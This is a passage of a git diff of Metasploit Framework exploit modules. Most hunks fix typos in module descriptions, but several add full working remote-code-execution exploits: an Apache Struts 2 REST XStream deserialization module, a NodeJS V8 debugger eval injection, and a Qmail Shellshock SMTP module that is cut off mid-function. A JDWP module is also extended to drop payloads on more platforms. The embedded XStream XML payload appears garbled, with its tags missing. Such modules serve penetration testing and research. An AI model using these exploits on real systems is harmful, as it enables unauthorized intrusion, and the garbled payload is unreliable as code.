Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in PhpTax, an income tax report generator. When generating a PDF, the icondrawpng() function in drawimage.php - does not properly handle the pfilez parameter, which will be used in a exec() + does not properly handle the pfilez parameter, which will be used in an exec() statement, and then results in arbitrary remote code execution under the context of the web server. Please note: authentication is not required to exploit this vulnerability. diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 978eb6f6d4..0c4b3d8e38 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote an arbitrary payload embedded in a JSP. The module has been tested successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run - successfully while testing, shell payload have been used. + successfully while testing, shell payload has been used. }, 'Author' => [ diff --git a/modules/exploits/multi/http/struts2_content_type_ognl.rb b/modules/exploits/multi/http/struts2_content_type_ognl.rb index 91b89ffea4..1b4ba5e634 100644 --- a/modules/exploits/multi/http/struts2_content_type_ognl.rb +++ b/modules/exploits/multi/http/struts2_content_type_ognl.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', 'Description' => %q{ - This module exploits a remote code execution vunlerability in Apache Struts + This module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. diff --git a/modules/exploits/multi/http/struts2_rest_xstream.rb b/modules/exploits/multi/http/struts2_rest_xstream.rb new file mode 100644 index 0000000000..d3308d6c75 --- /dev/null +++ b/modules/exploits/multi/http/struts2_rest_xstream.rb @@ -0,0 +1,194 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Struts 2 REST Plugin XStream RCE', + 'Description' => %q{ + Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12, + using the REST plugin, are vulnerable to a Java deserialization attack + in the XStream library. + }, + 'Author' => [ + 'Man Yue Mo', # Vulnerability discovery + 'wvu' # Metasploit module + ], + 'References' => [ + ['CVE', '2017-9805'], + ['URL', 'https://struts.apache.org/docs/s2-052.html'], + ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'], + ['URL', 'https://github.com/mbechler/marshalsec'] + ], + 'DisclosureDate' => 'Sep 5 2017', + 'License' => MSF_LICENSE, + 'Platform' => ['unix', 'python', 'linux', 'win'], + 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], + 'Privileged' => false, + 'Targets' => [ + ['Unix (In-Memory)', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD + ], + ['Python (In-Memory)', + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON + ], +=begin this stuff that doesn't work yet + ['PowerShell (In-Memory)', + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + ], +=end + ['Linux (Dropper)', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64] + ], + ['Windows (Dropper)', + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + ] + ], + 'DefaultTarget' => 0 + )) + + register_options([ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to Struts action', '/struts2-rest-showcase/orders/3']) + ]) + end + + def check + if execute_command(random_crap) + CheckCode::Appears + else + CheckCode::Safe + end + end + + def exploit + case target.name + when /Unix/, /Python/, /PowerShell/ + execute_command(payload.encoded) + else + execute_cmdstager + end + end + + # + # Exploit methods + # + + def execute_command(cmd, opts = {}) + cmd = case target.name + when /Unix/, /Linux/ + %W{/bin/sh -c #{cmd}} + when /Python/ + %W{python -c #{cmd}} + when /PowerShell/ + # This doesn't work yet + %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}} + when /Windows/ + %W{cmd.exe /c #{cmd}} + end + + # Encode each command argument with XML entities + cmd.map! { |arg| arg.encode(xml: :text) } + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => target_uri.path, + 'ctype' => 'application/xml', + 'data' => xstream_payload(cmd) + ) + + check_response(res) || fail_with(Failure::UnexpectedReply, res.inspect) + end + + # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO + def xstream_payload(cmd) + # XXX: and need to be removed for Windows + < + + + 0 + + + + + + false + 0 + + + + + + #{cmd.join('')} + + false + + + + + java.lang.ProcessBuilder + start + + + #{random_crap} + + #{random_crap} + + + + + + false + 0 + 0 + false + + false + + + + 0 + + + + + + + + + +EOF + end + + # + # Utility methods + # + + def check_response(res) + res && res.code == 500 && res.body.include?(error_string) + end + + def error_string + 'java.lang.String cannot be cast to java.security.Provider$Service' + end + + def random_crap + Rex::Text.rand_text_alphanumeric(rand(42) + 1) + end + +end diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb index 555f82139e..edb0f2335c 100644 --- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated - file uploads and handles zip file contents in a insecure way. By combining both weaknesses, + file uploads and handles zip file contents in an insecure way. By combining both weaknesses, a remote attacker can accomplish remote code execution. Note that this will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection against null byte injection in file names. This module has been tested successfully on version diff --git a/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb b/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb index 110e7abc87..586b0ab0ef 100644 --- a/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb +++ b/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote Note: You have the option to use the authentication bypass or not since it requires that the server is rebooted. The password reset will render the authentication useless. Typically, if an administrator cant login, they will bounce the box. Therefore, this - module performs a heart beat request until the box is bounced and then attempts to login + module performs a heartbeat request until the box is bounced and then attempts to login and to perform the command injection. This module has been tested on version 2.6.1062r1 of the appliance. }, diff --git a/modules/exploits/multi/http/uptime_file_upload_2.rb b/modules/exploits/multi/http/uptime_file_upload_2.rb index 1ddcff8c88..3fd494853f 100644 --- a/modules/exploits/multi/http/uptime_file_upload_2.rb +++ b/modules/exploits/multi/http/uptime_file_upload_2.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated by the vendor. - Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it + Although the mitigation in place will prevent uptime_file_upload_1.rb from working, it can still be bypassed and gain privilege escalation, and allows the attacker to upload file again, and execute arbitrary commands. }, diff --git a/modules/exploits/multi/http/vtiger_php_exec.rb b/modules/exploits/multi/http/vtiger_php_exec.rb index 2731360ea0..b12508d8d0 100644 --- a/modules/exploits/multi/http/vtiger_php_exec.rb +++ b/modules/exploits/multi/http/vtiger_php_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ vTiger CRM allows an authenticated user to upload files to embed within documents. Due to insufficient privileges on the 'files' upload folder, an attacker can upload a PHP - script and execute aribtrary PHP code remotely. + script and execute arbitrary PHP code remotely. This module was tested against vTiger CRM v5.4.0 and v5.3.0. }, diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index 797a30facc..ed54ac1f02 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb +++ b/modules/exploits/multi/http/vtiger_soap_upload.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload', 'Description' => %q{ - vTiger CRM allows an user to bypass authentication when requesting SOAP services. + vTiger CRM allows a user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index 7328cdfb60..f794504e09 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in WebPageTest's Upload Feature. By default, the resultimage.php file does not verify the user-supplied item before - saving it to disk, and then places this item in the web directory accessable by + saving it to disk, and then places this item in the web directory accessible by remote users. This flaw can be abused to gain remote code execution. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 12e5bd3132..56368c7074 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in WikkaWiki. When the spam logging feature is enabled, it is possible to inject PHP code into the spam log file via the - UserAgent header , and then request it to execute our payload. There are at least + UserAgent header, and then request it to execute our payload. There are at least three different ways to trigger spam protection, this module does so by generating 10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6). diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb index 14a05770fd..25dd0dd60d 100644 --- a/modules/exploits/multi/http/x7chat2_php_exec.rb +++ b/modules/exploits/multi/http/x7chat2_php_exec.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution', 'Description' => %q{ This module exploits a post-auth vulnerability found in X7 Chat versions - 2.0.0 up to 2.0.5.1. The vulnerable code exists on lib/message.php, which + 2.0.0 up to 2.0.5.1. The vulnerable code exists on lib/message.php, which uses preg_replace() function with the /e modifier. This allows a remote authenticated attacker to execute arbitrary PHP code in the remote machine. }, diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index ade24f8adb..de100b0b9a 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ ZABBIX allows an administrator to create scripts that will be run on hosts. An authenticated attacker can create a script containing a payload, then a host - with an IP of 127.0.0.1 and run the abitrary script on the ZABBIX host. + with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host. - This module was tested againt Zabbix v2.0.9. + This module was tested against Zabbix v2.0.9. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/multi/http/zenworks_control_center_upload.rb b/modules/exploits/multi/http/zenworks_control_center_upload.rb index 6832d348f4..e5918279e8 100644 --- a/modules/exploits/multi/http/zenworks_control_center_upload.rb +++ b/modules/exploits/multi/http/zenworks_control_center_upload.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Novell ZENworks Configuration Management Remote Execution', 'Description' => %q{ This module exploits a code execution flaw in Novell ZENworks Configuration - Management 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control + Management 10 SP3 and 11 SP2. The vulnerability exists in the ZENworks Control Center application, allowing an unauthenticated attacker to upload a malicious file outside of the TEMP directory and then make a second request that allows for arbitrary code execution. This module has been tested successfully on Novell diff --git a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb index 2eb186f7aa..b8f06786d9 100644 --- a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb +++ b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Zpanel Remote Unauthenticated RCE', 'Description' => %q{ This module exploits an information disclosure vulnerability - in Zpanel. The vulnerability is due to a vulnerable version + in ZPanel. The vulnerability is due to a vulnerable version of pChart used by ZPanel that allows unauthenticated users to read arbitrary files remotely on the file system. This particular module utilizes this vulnerability to identify the username/password diff --git a/modules/exploits/multi/misc/indesign_server_soap.rb b/modules/exploits/multi/misc/indesign_server_soap.rb index dbaefa9031..86881c09d3 100644 --- a/modules/exploits/multi/misc/indesign_server_soap.rb +++ b/modules/exploits/multi/misc/indesign_server_soap.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution', 'Description' => %q{ This module abuses the "RunScript" procedure provided by the SOAP interface of - Adobe InDesign Server, to execute abritary vbscript (Windows) or applescript(OSX). + Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX). The exploit drops the payload on the server and must be removed manually. }, diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 87f992ab1c..779dd93574 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -91,26 +91,19 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'], ['URL', 'http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html'] ], - 'Platform' => %w{ linux win }, - 'Arch' => ARCH_X86, + 'Platform' => %w{ linux osx win }, + 'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64], 'Payload' => { - 'Space' => 2048, + 'Space' => 10000000, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ - [ 'Linux x86 (Native Payload)', - { - 'Platform' => 'linux' - } - ], - [ 'Windows x86 (Native Payload)', - { - 'Platform' => 'win' - } - ] + [ 'Linux (Native Payload)', { 'Platform' => 'linux' } ], + [ 'OSX (Native Payload)', { 'Platform' => 'osx' } ], + [ 'Windows (Native Payload)', { 'Platform' => 'win' } ] ], 'DefaultTarget' => 0, 'License' => MSF_LICENSE, @@ -175,24 +168,18 @@ class MetasploitModule < Msf::Exploit::Remote if pkt_len < 4 fail_with(Failure::Unknown, "#{peer} - Received corrupted response") end - pkt_len = pkt_len - 4 - - response = sock.get_once(pkt_len, timeout) - fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response - while response.length < pkt_len - partial = sock.get_once(pkt_len, timeout) - fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial - response << partial - end - - fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length == pkt_len - - id, flags, err_code = response.unpack('NCn') - response.slice!(0..6) + id, flags, err_code = sock.get_once(7, timeout).unpack('NCn') if err_code != 0 && flags == REPLY_PACKET_TYPE fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}") end + response = "" + while response.length + 11 < pkt_len + partial = sock.get_once(pkt_len, timeout) + fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial + response << partial + end + fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length + 11 == pkt_len response end @@ -207,8 +194,7 @@ class MetasploitModule < Msf::Exploit::Remote # Unpacks received string structure from the server response into a normal string def read_string(data) data_len = data.unpack('N')[0] - data.slice!(0..3) - return data.slice!(0,data_len) + return data[4,data_len] end # Creates a new string object in the target VM and returns its id @@ -252,10 +238,11 @@ class MetasploitModule < Msf::Exploit::Remote # Parses given data according to a set of formats def parse_entries(buf, formats, explicit=true) entries = [] + index = 0 if explicit nb_entries = buf.unpack('N')[0] - buf.slice!(0..3) + buf = buf[4..-1] else nb_entries = 1 end @@ -270,25 +257,25 @@ class MetasploitModule < Msf::Exploit::Remote formats.each do |fmt,name| if fmt == "L" || fmt == 8 - data[name] = buf.unpack('Q>')[0] - buf.slice!(0..7) + data[name] = buf[index, 8].unpack('Q>')[0] + index += 8 elsif fmt == "I" || fmt == 4 - data[name] = buf.unpack('N')[0] - buf.slice!(0..3) + data[name] = buf[index, 4].unpack('N')[0] + index += 4 elsif fmt == "S" - data_len = buf.unpack('N')[0] - buf.slice!(0..3) - data[name] = buf.slice!(0,data_len) + data_len = buf[index, 4].unpack('N')[0] + data[name] = buf[index + 4, data_len] + index += 4 + data_len elsif fmt == "C" - data[name] = buf.unpack('C')[0] - buf.slice!(0) + data[name] = buf[index].unpack('C')[0] + index += 1 elsif fmt == "Z" - t = buf.unpack('C')[0] - buf.slice!(0) + t = buf[index].unpack('C')[0] if t == 115 - data[name] = solve_string(buf.slice!(0..7)) + data[name] = solve_string(buf[index + 1, 8]) + index += 9 elsif t == 73 - data[name], buf = buf.unpack('NN') + data[name], buf = buf[index +1, 4].unpack('NN') end else fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response") @@ -340,13 +327,13 @@ class MetasploitModule < Msf::Exploit::Remote sock.put(create_packet(ALLTHREADS_SIG)) response = read_reply num_threads = response.unpack('N').first - response.slice!(0..3) + index = 4 size = @vars["objectid_size"] num_threads.times do - t_id = unformat(size, response[0..size-1]) + t_id = unformat(size, response[index, size]) @threads[t_id] = nil - response.slice!(0..size-1) + index += size end end @@ -429,10 +416,8 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, "Bad response when getting value for field") end - response.slice!(0..4) - len = @vars["objectid_size"] - value = unformat(len, response) + value = unformat(len, response[5..-1]) value end @@ -688,15 +673,16 @@ class MetasploitModule < Msf::Exploit::Remote when 'linux' path = temp_path || '/tmp/' payload_exe = "#{path}#{payload_exe}" - if @os.downcase =~ /win/ - print_warning("#{@os} system detected but using Linux target...") - end + when 'osx' + path = temp_path || '/private/tmp/' + payload_exe = "#{path}#{payload_exe}" when 'win' path = temp_path || './' payload_exe = "#{path}#{payload_exe}.exe" - unless @os.downcase =~ /win/ - print_warning("#{@os} system detected but using Windows target...") - end + end + + if @os.downcase =~ /target['Platform']/ + print_warning("#{@os} system detected but using #{target['Platform']} target...") end return payload_exe, pl_exe @@ -900,7 +886,7 @@ class MetasploitModule < Msf::Exploit::Remote close_file(thread_id, file) # 5b. When linux arch, give execution permissions to file - if target['Platform'] == 'linux' + if target['Platform'] == 'linux' || target['Platform'] == 'osx' cmd = "chmod +x #{payload_exe}" execute_command(thread_id, cmd) end diff --git a/modules/exploits/multi/misc/legend_bot_exec.rb b/modules/exploits/multi/misc/legend_bot_exec.rb index cf440b2f4a..76b480566b 100644 --- a/modules/exploits/multi/misc/legend_bot_exec.rb +++ b/modules/exploits/multi/misc/legend_bot_exec.rb @@ -12,13 +12,13 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Legend Perl IRC Bot Remote Code Execution', 'Description' => %q{ - This module exploits a remote command execution on the Legend Perl IRC Bot . + This module exploits a remote command execution on the Legend Perl IRC Bot. This bot has been used as a payload in the Shellshock spam last October 2014. This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and UDP flooding, the ability to remove system logs, and ability to gain root, and VNC scanning. - Kevin Stevens, a Senior Threat Researcher at Damballa has uploaded this script + Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76. }, 'Author' => diff --git a/modules/exploits/multi/misc/nodejs_v8_debugger.rb b/modules/exploits/multi/misc/nodejs_v8_debugger.rb new file mode 100644 index 0000000000..ac1e5b4573 --- /dev/null +++ b/modules/exploits/multi/misc/nodejs_v8_debugger.rb @@ -0,0 +1,90 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + + MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n" + + def initialize(info={}) + super(update_info(info, + 'Name' => "NodeJS Debugger Command Injection", + 'Description' => %q{ + This module uses the "evaluate" request type of the NodeJS V8 + debugger protocol (version 1) to evaluate arbitrary JS and + call out to other system commands. The port (default 5858) is + not exposed non-locally in default configurations, but may be + exposed either intentionally or via misconfiguration. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Patrick Thomas ' ], + 'References' => + [ + [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ], + [ 'URL', 'https://github.com/nodejs/node/pull/8106' ] + ], + 'Targets' => + [ + ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ], + ], + 'Privileged' => false, + 'DisclosureDate' => "Aug 15 2016", + 'DefaultTarget' => 0) + ) + + register_options( + [ + Opt::RPORT(5858) + ]) + end + + def make_eval_message + msg_body = { seq: 1, + type: 'request', + command: 'evaluate', + arguments: { expression: payload.encoded, + global: true, + maxStringLength:-1 + } + }.to_json + msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length} + msg_header + msg_body + end + + def check + connect + res = sock.get_once + disconnect + + if res.include? "V8-Version" and res.include? "Protocol-Version: 1" + vprint_status("Got debugger handshake:\n#{res}") + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Unknown + end + + def exploit + connect + # must consume incoming handshake before sending payload + buf = sock.get_once + msg = make_eval_message + print_status("Sending #{msg.length} byte payload...") + vprint_status("#{msg}") + sock.put(msg) + buf = sock.get_once + + if buf.include? '"command":"evaluate","success":true' + print_status("Got success response") + elsif buf.include? '"command":"evaluate","success":false' + print_error("Got failure response: #{buf}") + else + print_error("Got unexpected response: #{buf}") + end + end + +end diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index 6ac5a0970f..37334b24aa 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or - a fileformat that OS X might automount), and then execute it in /Volumes/[share]. + a file format that OS X might automount), and then execute it in /Volumes/[share]. If there's some kind of bug that leaks the victim machine's current username, then it's also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index aea3f6f4b0..8f9960e8d8 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, - 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerablity. + 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability. }, 'Author' => [ diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index c8460f9b3e..f51ec3ce44 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local Note: If the user has locked the Date/Time preferences, requests to overwrite the system clock will be ignored, and the module will silently fail. However, if the "Require an administrator password to access locked preferences" setting - is not enabled, the Date/Time preferences are often unlocked everytime the admin + is not enabled, the Date/Time preferences are often unlocked every time the admin logs in, so you can install persistence and wait for a chance later. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index 82539a609e..98da8084b3 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability', 'Description' => %q{ - This module exploits the argument injection vulnerabilty + This module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11. }, 'Author' => [ 'MC' ], diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index 75dbfa1db1..fa18f67d63 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'LifeSize Room Command Injection', 'Description' => %q{ This module exploits a vulnerable resource in LifeSize - Room versions 3.5.3 and 4.7.18 to inject OS commmands. LifeSize + Room versions 3.5.3 and 4.7.18 to inject OS commands. LifeSize Room is an appliance and thus the environment is limited resulting in a small set of payload options. }, diff --git a/modules/exploits/unix/local/at_persistence.rb b/modules/exploits/unix/local/at_persistence.rb index 7dc93e6020..f9bbe01b21 100644 --- a/modules/exploits/unix/local/at_persistence.rb +++ b/modules/exploits/unix/local/at_persistence.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Local info, 'Name' => 'at(1) Persistence', 'Description' => %q( - This module achieves persisience by executing payloads via at(1). + This module achieves persistence by executing payloads via at(1). ), 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/unix/misc/psh_auth_bypass.rb b/modules/exploits/unix/misc/psh_auth_bypass.rb index 016970fd0c..efd720ef17 100644 --- a/modules/exploits/unix/misc/psh_auth_bypass.rb +++ b/modules/exploits/unix/misc/psh_auth_bypass.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 18 2013', 'Description' => %q( The login component of the Polycom Command Shell on Polycom HDX - video endpints, running software versions 3.0.5 and earlier, + video endpoints, running software versions 3.0.5 and earlier, is vulnerable to an authorization bypass when simultaneous connections are made to the service, allowing remote network attackers to gain access to a sandboxed telnet prompt without diff --git a/modules/exploits/unix/misc/xerox_mfp.rb b/modules/exploits/unix/misc/xerox_mfp.rb index 2c443fb470..38735fbbee 100644 --- a/modules/exploits/unix/misc/xerox_mfp.rb +++ b/modules/exploits/unix/misc/xerox_mfp.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary - commands under root priviages. + commands under root privileges. }, 'Author' => [ diff --git a/modules/exploits/unix/smtp/qmail_bash_env_exec.rb b/modules/exploits/unix/smtp/qmail_bash_env_exec.rb new file mode 100644 index 0000000000..5f657dac0d --- /dev/null +++ b/modules/exploits/unix/smtp/qmail_bash_env_exec.rb @@ -0,0 +1,109 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Smtp + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)', + 'Description' => %q{ + This module exploits a shellshock vulnerability on Qmail, a public + domain MTA written in C that runs on Unix systems. + Due to the lack of validation on the MAIL FROM field, it is possible to + execute shell code on a system with a vulnerable BASH (Shellshock). + This flaw works on the latest Qmail versions (qmail-1.03 and + netqmail-1.06). + However, in order to execute code, /bin/sh has to be linked to bash + (usually default configuration) and a valid recipient must be set on the + RCPT TO field (usually admin@exampledomain.com). + The exploit does not work on the "qmailrocks" community version + as it ensures the MAILFROM field is well-formed. + }, + 'Author' => + [ + 'Mario Ledo (Metasploit module)', + 'Gabriel Follon (Metasploit module)', + 'Kyle George (Vulnerability discovery)' + ], + 'License' => MSF_LICENSE, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'References' => + [ + ['CVE', '2014-6271'], + ['CWE', '94'], + ['OSVDB', '112004'], + ['EDB', '34765'], + ['URL', 'http://seclists.org/oss-sec/2014/q3/649'], + ['URL', 'https://lists.gt.net/qmail/users/138578'] + ], + 'Payload' => + { + 'BadChars' => "\x3e", + 'Space' => 888, + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet perl ruby python' + # telnet ruby python and perl works only if installed on target + } + }, + 'Targets' => [ [ 'Automatic', { }] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 24 2014' + )) + + deregister_options('MAILFROM') + end + + def smtp_send(data = nil) + begin + result = '' + code = 0 + sock.put("#{data}") + result = sock.get_once + result.chomp! if (result) + code = result[0..2].to_i if result + return result, code + rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError + return result, 0 + rescue ::Exception => e + print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'") + return nil, 0 + end + end + + def exploit + to = datastore['MAILTO'] + connect + result = smtp_send("HELO localhost\r\n") + if result[1] < 200 